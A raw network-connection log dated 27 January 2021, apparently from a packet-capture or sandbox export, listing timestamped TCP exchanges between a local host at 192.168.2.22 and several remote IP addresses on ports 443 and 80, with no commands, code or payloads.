                                                                                                                                                                                                            Jan 27, 2021 07:16:57.045955896 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046642065 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046665907 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046679974 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046699047 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046706915 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046716928 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046719074 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046725988 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046734095 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046739101 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046750069 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046752930 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046766996 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046771049 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046782017 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046785116 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046801090 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046802044 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046819925 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046823025 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046835899 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046852112 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046863079 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046868086 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046870947 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046876907 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046883106 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046890974 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046904087 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046905041 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046920061 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046924114 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046938896 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.046955109 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047605038 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047627926 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047642946 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047657013 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047658920 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047668934 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047674894 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047683954 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047691107 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047694921 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047708035 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047710896 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047724009 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047729015 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047744036 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047745943 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047760963 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047760963 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047774076 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047777891 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047795057 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047811985 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047812939 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047821045 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047826052 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047827959 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047846079 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.047863007 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049186945 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049211025 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049228907 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049243927 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049258947 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049262047 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049268007 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049273014 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049277067 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049278975 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049297094 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049303055 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049312115 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049324036 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049338102 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049343109 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049345970 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049350977 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049359083 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049365044 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049370050 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049401999 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049412966 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049503088 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049549103 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049562931 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049581051 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049597025 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049606085 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049612999 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049632072 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049649954 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049654961 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049663067 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049665928 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049670935 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049675941 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049680948 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049689054 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049696922 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049709082 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049712896 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049724102 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049729109 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049738884 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049741983 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049755096 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049771070 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.049786091 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050246000 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050266027 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050282001 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050297976 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050301075 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050316095 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050317049 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050322056 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050333977 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050335884 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050350904 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050350904 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050367117 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050368071 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050384045 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050395012 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050398111 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050407887 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050421953 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050424099 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050431967 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050436974 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050448895 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050461054 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050472975 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050476074 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050483942 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050488949 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050492048 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050507069 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050512075 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.050530910 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051167011 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051191092 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051206112 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051220894 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051233053 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051239014 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051244020 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051251888 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051254034 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051258087 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051270962 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051275015 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051290035 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051301003 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051311016 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051311970 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051328897 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051345110 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051348925 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051361084 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051362991 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051368952 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051377058 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051382065 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051388979 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051394939 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051402092 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051414013 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051429987 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051430941 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051441908 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051448107 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.051469088 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052129984 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052156925 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052174091 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052190065 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052194118 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052203894 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052207947 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052208900 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052225113 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052229881 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052241087 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052243948 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052257061 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052258015 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052270889 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052285910 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052287102 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052299976 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052303076 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052305937 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052319050 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052333117 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052335978 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052342892 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052351952 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052356958 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052371025 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052371979 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052390099 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052390099 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052405119 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052405119 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052436113 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.052450895 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053061008 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053086042 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053102016 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053112030 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053118944 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053123951 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053134918 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053134918 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053150892 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053158045 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053169012 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053172112 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053185940 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053186893 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053203106 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053205013 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053216934 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053222895 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053237915 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053250074 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053253889 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053262949 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053266048 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053278923 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053282976 CET44349165162.159.130.233192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053294897 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053313017 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.053325891 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:16:57.570944071 CET49165443192.168.2.22162.159.130.233
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.324827909 CET4916680192.168.2.2250.87.169.249
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.510375977 CET804916650.87.169.249192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.510598898 CET4916680192.168.2.2250.87.169.249
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.510798931 CET4916680192.168.2.2250.87.169.249
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.696202040 CET804916650.87.169.249192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.720585108 CET804916650.87.169.249192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.721052885 CET4916680192.168.2.2250.87.169.249
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.911390066 CET804916650.87.169.249192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:17:46.911614895 CET4916680192.168.2.2250.87.169.249
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.102854967 CET4916780192.168.2.2223.228.109.141
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.296253920 CET804916723.228.109.141192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.296585083 CET4916780192.168.2.2223.228.109.141
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.296983957 CET4916780192.168.2.2223.228.109.141
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.490161896 CET804916723.228.109.141192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.535023928 CET804916723.228.109.141192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.535068989 CET804916723.228.109.141192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.535418034 CET4916780192.168.2.2223.228.109.141
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.535583973 CET4916780192.168.2.2223.228.109.141
                                                                                                                                                                                                            Jan 27, 2021 07:17:57.729041100 CET804916723.228.109.141192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:02.709412098 CET4916880192.168.2.22208.92.209.208
                                                                                                                                                                                                            Jan 27, 2021 07:18:02.881968021 CET8049168208.92.209.208192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:02.882226944 CET4916880192.168.2.22208.92.209.208
                                                                                                                                                                                                            Jan 27, 2021 07:18:02.882548094 CET4916880192.168.2.22208.92.209.208
                                                                                                                                                                                                            Jan 27, 2021 07:18:03.057116985 CET8049168208.92.209.208192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:03.057518959 CET4916880192.168.2.22208.92.209.208
                                                                                                                                                                                                            Jan 27, 2021 07:18:03.057646036 CET4916880192.168.2.22208.92.209.208
                                                                                                                                                                                                            Jan 27, 2021 07:18:03.229707956 CET8049168208.92.209.208192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:20.998861074 CET4916980192.168.2.2281.17.18.195
                                                                                                                                                                                                            Jan 27, 2021 07:18:21.048800945 CET804916981.17.18.195192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:21.048892021 CET4916980192.168.2.2281.17.18.195
                                                                                                                                                                                                            Jan 27, 2021 07:18:21.049287081 CET4916980192.168.2.2281.17.18.195
                                                                                                                                                                                                            Jan 27, 2021 07:18:21.099689007 CET804916981.17.18.195192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:21.128422022 CET804916981.17.18.195192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:21.128648996 CET804916981.17.18.195192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:21.128740072 CET4916980192.168.2.2281.17.18.195
                                                                                                                                                                                                            Jan 27, 2021 07:18:21.128842115 CET4916980192.168.2.2281.17.18.195
                                                                                                                                                                                                            Jan 27, 2021 07:18:21.180613995 CET804916981.17.18.195192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.296122074 CET4917080192.168.2.22104.21.47.75
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.342083931 CET8049170104.21.47.75192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.342200994 CET4917080192.168.2.22104.21.47.75
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.342557907 CET4917080192.168.2.22104.21.47.75
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.388353109 CET8049170104.21.47.75192.168.2.22
                                                                                                                                                                                                            Jan 27, 2021 07:18:31.398302078 CET8049170104.21.47.75192.168.2.22
